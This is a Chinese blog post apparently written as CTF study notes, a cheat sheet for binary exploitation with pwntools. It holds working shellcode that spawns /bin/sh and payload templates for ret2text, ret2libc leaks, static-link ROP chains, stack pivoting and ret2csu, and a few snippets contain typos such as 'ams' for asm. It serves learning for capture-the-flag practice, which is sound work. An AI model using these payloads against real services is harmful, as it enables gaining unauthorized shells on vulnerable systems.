<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="PWN题目总结PWNTOOLS基本使用1234567891011121314151617181920212223242526272829303132from pwn import *from LibcSearcher import *context(log_level&#x3D;&amp;#x27;debug&amp;#x27;, os&#x3D;&amp;#x27;Linux&amp;#x27;, arch&#x3D;&amp;#x27;amd64&amp;#x27;)#">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn">
<meta property="og:url" content="http://example.com/2022/09/30/pwn/index.html">
<meta property="og:site_name" content="s1eepstar&#39;s blog">
<meta property="og:description" content="PWN题目总结PWNTOOLS基本使用1234567891011121314151617181920212223242526272829303132from pwn import *from LibcSearcher import *context(log_level&#x3D;&amp;#x27;debug&amp;#x27;, os&#x3D;&amp;#x27;Linux&amp;#x27;, arch&#x3D;&amp;#x27;amd64&amp;#x27;)#">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-09-29T17:30:33.000Z">
<meta property="article:modified_time" content="2022-09-29T17:30:52.063Z">
<meta property="article:author" content="s1eepstar">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/09/30/pwn/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>pwn | s1eepstar's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">s1eepstar's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">是学习笔记，亦是成长历程</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/09/30/pwn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="s1eepstar">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="s1eepstar's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pwn
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-09-30 01:30:33 / 修改时间：01:30:52" itemprop="dateCreated datePublished" datetime="2022-09-30T01:30:33+08:00">2022-09-30</time>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="PWN题目总结"><a href="#PWN题目总结" class="headerlink" title="PWN题目总结"></a>PWN题目总结</h1><h2 id="PWNTOOLS"><a href="#PWNTOOLS" class="headerlink" title="PWNTOOLS"></a>PWNTOOLS</h2><h3 id="基本使用"><a href="#基本使用" class="headerlink" title="基本使用"></a>基本使用</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>, os=<span class="string">&#x27;Linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"><span class="comment">#32位为i386，64位为amd64</span></span><br><span class="line">p=process(<span class="string">&#x27;./filename&#x27;</span>)<span class="comment">#打本地</span></span><br><span class="line">p=remote(<span class="string">&#x27;192.168.1.103&#x27;</span>,<span class="number">10001</span>)<span class="comment">#打远程</span></span><br><span class="line">p.close()  <span class="comment">#关闭</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#连接gdb</span></span><br><span class="line">gdb.attach(p)</span><br><span class="line">sleep(<span class="number">1</span>)<span class="comment">#防止gdb还没连接就执行到后面了</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">hex</span>() 将十进制转化成<span class="number">16</span>进制</span><br><span class="line"><span class="comment">#发送 payload</span></span><br><span class="line">p32()\p64()\u32()\u64()<span class="comment">#发送数据前需要p32或p64、</span></span><br><span class="line">cyclic(<span class="number">100</span>)<span class="comment">#生成100个填充字符</span></span><br><span class="line">p.send(payload)   发送 payload</span><br><span class="line">p.sendline(payload)   发送 payload，并进行换行（末尾\n）</span><br><span class="line">p.sendafter(some_string, payload)   接收到 some_string 后, 发送你的 payload</span><br><span class="line">p.sendlineafter(some_string, payload)   接收到 some_string 后, 发送你的 payload，加个换行</span><br><span class="line"></span><br><span class="line"><span class="comment">#接收返回内容</span></span><br><span class="line">p.recv(N)   接受 N(数字) 字符</span><br><span class="line">p.recvline()  接收一行输出</span><br><span class="line">p.recvlines(N)   接收 N(数字) 行输出</span><br><span class="line">p.recvuntil(some_string)   接收到 some_string 为止</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;AAA&#x27;</span>,drop=<span class="number">1</span>/<span class="number">0</span>)	接收到<span class="string">&#x27;AAA&#x27;</span>为止，<span class="number">1</span>代表不保留<span class="number">3</span>个<span class="string">&#x27;A&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#生成 shellcode</span></span><br><span class="line">asm(shellcraft.sh())</span><br><span class="line"></span><br><span class="line">p.interactive()    直接进行交互，相当于回到shell的模式，一般在取得shell之后使用</span><br></pre></td></tr></table></figure>

<h3 id="ELF"><a href="#ELF" class="headerlink" title="ELF"></a>ELF</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">首先需要 elf=ELF(<span class="string">&#x27;./filename&#x27;</span>) 来产生一个对象</span><br><span class="line">elf.symbols[<span class="string">&#x27;a_function&#x27;</span>]  找到标识符 a_function 的地址</span><br><span class="line">elf.got[<span class="string">&#x27;a_function&#x27;</span>]  找到函数 a_function的 got</span><br><span class="line">elf.plt[<span class="string">&#x27;a_function&#x27;</span>]  找到函数 a_function 的 plt</span><br><span class="line">elf.<span class="built_in">next</span>(e.search(<span class="string">&quot;some_characters&quot;</span>))  找到包含 some_characters 可以是字符串，汇编代码或者某个数值的地址</span><br></pre></td></tr></table></figure>

<h3 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">rop = ROP(<span class="string">&#x27;./filename&#x27;</span>) 还是要先创建一个对象</span><br><span class="line">rop.raw(<span class="string">&#x27;a&#x27;</span>*<span class="number">32</span>)   在构造的 rop 链里面写 <span class="number">32</span> 个 a</span><br><span class="line">rop.call(<span class="string">&#x27;read&#x27;</span>, (<span class="number">0</span>, elf.bss(<span class="number">0x80</span>)))  调用一个函数，可以简写成：rop.read(<span class="number">0</span>, elf.bss(<span class="number">0x80</span>))</span><br><span class="line">rop.chain()   就是整个 rop 链，发送的 payload</span><br><span class="line">rop.dump()  直观地展示当前的 rop 链</span><br><span class="line">rop.migrate(base_stage)   将程序流程转移到 base_stage（地址）</span><br><span class="line">rop.unresolve(value)  给出一个地址，反解析出符号</span><br><span class="line">rop.search(regs=[<span class="string">&#x27;ecx&#x27;</span>,<span class="string">&#x27;ebx&#x27;</span>])   搜索对 eax 进行操作的 gadgets</span><br><span class="line">rop.find_gadget([<span class="string">&#x27;pop eax&#x27;</span>,<span class="string">&#x27;ret&#x27;</span>])   搜索 pop eax ret 这样的 gadgets</span><br></pre></td></tr></table></figure>

<h3 id="LibcSearcher"><a href="#LibcSearcher" class="headerlink" title="LibcSearcher"></a>LibcSearcher</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#没有libc文件</span></span><br><span class="line">puts_addr = <span class="built_in">int</span>(p.recvline()[<span class="number">14</span>,-<span class="number">2</span>])<span class="comment">#输出的第14个字符到倒数第二个字符</span></span><br><span class="line"><span class="comment">#puts_addr = int(p.recvline()[14,-2]，16) 泄露的是16进制的地址</span></span><br><span class="line">puts_addr 为我们泄露出的值</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;puts&#x27;</span>, puts_addr)</span><br><span class="line">libc_base = puts_addr - libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line">system_addr = libc_base + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh_addr = libc_base + libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">libc.dump(<span class="string">&#x27;__libc_start_main_ret&#x27;</span>)</span><br><span class="line"><span class="comment">#有libc文件</span></span><br><span class="line">libc=ELF(<span class="string">&quot;./Libc文件&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;./libc-2.31.so&quot;</span>)</span><br><span class="line">libc_base = puts_addr - libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">system_addr = libc_base +libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b&quot;sh\x00&quot;</span>))</span><br><span class="line"></span><br><span class="line">libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"><span class="comment">#elf.search(b&quot;sh\x00&quot;)</span></span><br><span class="line"><span class="built_in">next</span>(elf.search(<span class="string">b&quot;sh\x00&quot;</span>))</span><br></pre></td></tr></table></figure>

<h3 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">shellcode = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">xor 	rsi,	rsi			</span></span><br><span class="line"><span class="string">push	rsi				</span></span><br><span class="line"><span class="string">mov 	rdi,	0x68732f2f6e69622f	 </span></span><br><span class="line"><span class="string">push	rdi</span></span><br><span class="line"><span class="string">push	rsp		</span></span><br><span class="line"><span class="string">pop	rdi				</span></span><br><span class="line"><span class="string">mov 	al,	59			</span></span><br><span class="line"><span class="string">cdq					</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">payload = asm(shellcode)</span><br><span class="line"><span class="comment">#该shellcode长度为22</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload1 = ams(shellcraft.sh())</span><br><span class="line">payload2 = payload . ljust(偏移值+4或+8 , b&#x27;A&#x27;) + p32/64(全局变量_addr) </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shellcode = ams(shellcraft.sh())</span><br><span class="line">payload = shellcode +b&#x27;\x90&#x27; * (偏移值+4/8 - len(shellcode)) + p32/64(返回地址)</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload = asm(shellcraft.cat(&#x27;flag&#x27;))</span><br><span class="line">payload = payload.ljust(0x38,&#x27;\x00&#x27;)</span><br></pre></td></tr></table></figure>



<h3 id="终端查找"><a href="#终端查找" class="headerlink" title="终端查找"></a>终端查找</h3><p>64位时，六个整型或指针参数依次保存在 <strong>RDI, RSI, RDX, RCX, R8 和 R9 寄存器</strong>中，如果还有更多的参数的话才会保存在栈上。</p>
<p>打远程有时候需要平衡栈，在ROP链的末端 + ret函数</p>
<p>ROPgadget –binary elf文件 –only “pop|ret”	找到text中有pop或ret的地址</p>
<p>ROPgadget –binary elf文件 –only “pop|ret”	| grep eax	含有eax</p>
<p>ROPgadget –binary elf文件 –only “0x80”</p>
<p>终端输入one_gadget libc文件			查看一些one gadget的偏移值</p>
<p>onegadget&#x3D;libcBase + 查看到的偏移值		(一个一个慢慢试)</p>
<p>payload &#x3D; flat(cyclic(偏移值+4&#x2F;8),onegadget)</p>
<p>cd 文件名</p>
<p>strings 文件名 | grep 字符串</p>
<h2 id="栈溢出题目"><a href="#栈溢出题目" class="headerlink" title="栈溢出题目"></a>栈溢出题目</h2><h3 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h3><p>payload &#x3D; b’A’ * 偏移量 + b’B’ * 4&#x2F;8 + p64(后门函数地址)</p>
<h3 id="没有后门函数但没有打开NX保护措施shellcode"><a href="#没有后门函数但没有打开NX保护措施shellcode" class="headerlink" title="没有后门函数但没有打开NX保护措施	shellcode"></a>没有后门函数但没有打开NX保护措施	shellcode</h3><p>payload1 &#x3D; asm(shellcraft.sh())</p>
<p>payload2 &#x3D; payload . ljust(偏移值+4或+8 , b’A’) + p32&#x2F;64(返回地址) </p>
<p>或者</p>
<p>shellcode &#x3D; asm(shellcraft.sh())</p>
<p>payload &#x3D; shellcode +b’\x90’ * (偏移值+4&#x2F;8 - len(shellcode)) + p32&#x2F;64(返回地址) 	\x90是空指令	NOP 使程序更稳定</p>
<h3 id="静态链接文件"><a href="#静态链接文件" class="headerlink" title="静态链接文件"></a>静态链接文件</h3><p>静态链接的文件系统调用函数比较多，可以构造出完整实现攻击的ROP链</p>
<p>如</p>
<p>int 0x80		代表进行系统调用</p>
<p>0xb				表示sys_execve()的系统调用号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pop_eax_ret=该函数地址</span><br><span class="line">pop_edx_ecx_ebx_ret=该函数地址</span><br><span class="line">int_80h=该函数地址</span><br><span class="line">bin_sh=字符串<span class="string">&quot;/bin/sh&quot;</span>的地址</span><br><span class="line">payload = flat([<span class="string">b&#x27;A&#x27;</span>*偏移值+<span class="number">4</span>/<span class="number">8</span>,pop_eax_ret,<span class="number">0xb</span>,pop_edx_ecx_ebx_ret,<span class="number">0</span>,<span class="number">0</span>,bin_sh,int_80h])</span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">112</span>+p32(pop_eax_ret)+p32(<span class="number">0xb</span>)+p32(pop_edx_ecx_ebx_ret)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(bin_sh)+p32(int_80h)</span><br></pre></td></tr></table></figure>

<h3 id="动态链接文件有system和”-x2F-bin-x2F-sh”但是分开"><a href="#动态链接文件有system和”-x2F-bin-x2F-sh”但是分开" class="headerlink" title="动态链接文件有system和”&#x2F;bin&#x2F;sh”但是分开"></a>动态链接文件有system和”&#x2F;bin&#x2F;sh”但是分开</h3><ul>
<li>32位</li>
</ul>
<p>payload &#x3D; padding + system_plt + 0xdeadbeef(填充ebp) + bin_sh_addr</p>
<ul>
<li>64位</li>
</ul>
<p>payload &#x3D; padding + pop_rdi_ret + bin_sh_addr + system_plt</p>
<h3 id="只有system没有”-x2F-bin-x2F-sh”"><a href="#只有system没有”-x2F-bin-x2F-sh”" class="headerlink" title="只有system没有”&#x2F;bin&#x2F;sh”"></a>只有system没有”&#x2F;bin&#x2F;sh”</h3><p>这边以read为例，不一定用read，也可以是其他输入函数</p>
<ul>
<li>32位</li>
</ul>
<p>一次性利用链</p>
<p>关于参数一：0是标准输入，1是标准输出</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">payload = padding + read_plt + system_plt + 参数一(<span class="number">0</span>) + 变量地址(/<span class="built_in">bin</span>/sh写入地址) + 参数<span class="number">3</span>(写入长度) + 变量地址(/<span class="built_in">bin</span>/sh写入地址)</span><br><span class="line"></span><br><span class="line">ROP利用链</span><br><span class="line"></span><br><span class="line">payload1 = padding + read_plt + main_addr + 参数一(<span class="number">0</span>) + 变量地址(/<span class="built_in">bin</span>/sh写入地址) + 参数<span class="number">3</span>(写入长度)</span><br><span class="line">payload2 = padding + sys_plt + <span class="number">0xdeadbeef</span> + 变量地址(/<span class="built_in">bin</span>/sh写入地址)</span><br></pre></td></tr></table></figure>

<ul>
<li>64位</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pop_rdi都会有单独的gadget，rsi多数以pop_rsi_r15形式出现，rdx少有gadget，这里假设gadget情况如下，实际做题实际调整：</span><br><span class="line"></span><br><span class="line">payload1 = padding + pop_rdi + 参数一(<span class="number">0</span>) + pop_rdi_r15 + binsh写入地址 + <span class="number">0xdeadbeef</span> + pop_rdx + 参数<span class="number">3</span>(写入长度) + read_plt</span><br><span class="line">payload2 = padding + pop_rdi + binsh写入地址 + system_plt</span><br><span class="line"></span><br><span class="line">pop_rdx gadget不一定有。这是可以尝试不传第三个参数，用寄存器rdx的原值，这个值有可能符合需要（若需要控制前三个参数了解一下ret2csu），payload简化如下：</span><br><span class="line"></span><br><span class="line">payload1 = padding + pop_rdi + 参数一(<span class="number">0</span>) + pop_rdi_r15 + binsh写入地址 + <span class="number">0xdeadbeef</span> + read_plt</span><br><span class="line">payload2 = padding + pop_rdi + binsh写入地址 + system_plt</span><br></pre></td></tr></table></figure>

<h3 id="无后门函数ret2libc"><a href="#无后门函数ret2libc" class="headerlink" title="无后门函数ret2libc"></a>无后门函数ret2libc</h3><ul>
<li>32位</li>
</ul>
<p>关于puts函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">payload1 = padding + puts_plt + main_addr + puts_got</span><br><span class="line">调用puts函数泄露出  puts_addr</span><br><span class="line">libc_base = puts_addr - puts_libc</span><br><span class="line">system_addr = libc_base + sys_libc</span><br><span class="line">binsh_addr = libc_base + binsh_libc</span><br><span class="line">payload2 = padding + system_addr + <span class="number">0xdeadbeef</span> + binsh_addr</span><br></pre></td></tr></table></figure>

<ul>
<li>64位</li>
</ul>
<p>关于puts函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">payload1= padding + pop_rdi + puts_got + puts_plt + main_addr</span><br><span class="line">puts_addr= <span class="built_in">hex</span>(u64(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>)))</span><br><span class="line">libc_base = puts_addr - puts_libc</span><br><span class="line">system_addr = libc_base + sys_libc</span><br><span class="line">binsh_addr = libc_base + binsh_libc</span><br><span class="line">payload2= padding + pop_rdi + binsh_addr + system_addr</span><br></pre></td></tr></table></figure>

<h3 id="溢出函数等于偏移值——栈迁移"><a href="#溢出函数等于偏移值——栈迁移" class="headerlink" title="溢出函数等于偏移值——栈迁移"></a>溢出函数等于偏移值——栈迁移</h3><ul>
<li>32位</li>
</ul>
<p>输入内容有两次，都是输入全局变量</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload1 = ams(shellcraft.sh())</span><br><span class="line">payload2 = payload . ljust(偏移值+<span class="number">4</span>或+<span class="number">8</span> , <span class="string">b&#x27;A&#x27;</span>) + p32/<span class="number">64</span>(全局变量_addr) </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shellcode = ams(shellcraft.sh())</span><br><span class="line">payload = shellcode +b&#x27;\x90&#x27; * (偏移值+4/8 - len(shellcode)) + p32/64(返回地址)</span><br></pre></td></tr></table></figure>

<p>输入内容有两次，第一次是全局变量，第二次是局部变量</p>
<p>泄露地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload1 = <span class="string">&#x27;a&#x27;</span>*<span class="number">4</span> + p32(puts_plt) + p32(main_addr) + p32(puts_got)</span><br><span class="line">payload2 = <span class="string">&#x27;a&#x27;</span>*偏移值 + p32(全局变量_addr) + p32(leave_ret)</span><br></pre></td></tr></table></figure>

<p>泄露地址后返回main函数，第二次运行程序。后续getshell可以用onegadget或者system(&#x2F;bin&#x2F;sh)</p>
<p>onegadget需要运气</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload3=[任意内容]</span><br><span class="line">payload4=<span class="string">&#x27;a&#x27;</span>*偏移值 + <span class="string">&#x27;a&#x27;</span>*<span class="number">4</span> + p32(onegadget)</span><br></pre></td></tr></table></figure>

<p>system(&#x2F;bin&#x2F;sh)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload3= <span class="string">&#x27;a&#x27;</span> *<span class="number">4</span>+p32(system_addr)+ p32(main) + p32(binsh_addr)</span><br><span class="line">payload4= <span class="string">&#x27;a&#x27;</span>*偏移值 + p32(全局变量_addr) + p32(leave_ret)</span><br></pre></td></tr></table></figure>

<h3 id="ret2csu"><a href="#ret2csu" class="headerlink" title="ret2csu"></a>ret2csu</h3><p>主要针对调用64位程序的函数需要使用到3个参数，ROPgadget没有</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">ret2csu</span>(<span class="params">got,rdi,rsi,rdx,addr</span>):</span><br><span class="line">	rop.raw(<span class="number">0</span>)</span><br><span class="line">	rop.raw(<span class="number">1</span>)</span><br><span class="line">	rop.raw(got) <span class="comment">#要被调用的函数</span></span><br><span class="line">	rop.raw(rdi) <span class="comment">#rdi</span></span><br><span class="line">	rop.raw(rsi) <span class="comment">#rsi</span></span><br><span class="line">	rop.raw(rdx) <span class="comment">#rdx</span></span><br><span class="line">	rop.raw(<span class="number">0x0000000004006C0</span>)<span class="comment">#mov段</span></span><br><span class="line">	rop.raw(<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>)	<span class="comment">#填充</span></span><br><span class="line">	rop.raw(p64(<span class="number">0</span>)*<span class="number">6</span>)<span class="comment">#填充</span></span><br><span class="line">	rop.raw(addr) <span class="comment">#返回addr</span></span><br><span class="line">    </span><br><span class="line">p.sendline(rop.chain())</span><br></pre></td></tr></table></figure>

<h3 id="栈迁移"><a href="#栈迁移" class="headerlink" title="栈迁移"></a>栈迁移</h3><p>payload &#x3D; padding + p32(s-4) + p32(leave_ret)</p>
<p>32位 -4 ， 64位 -8</p>
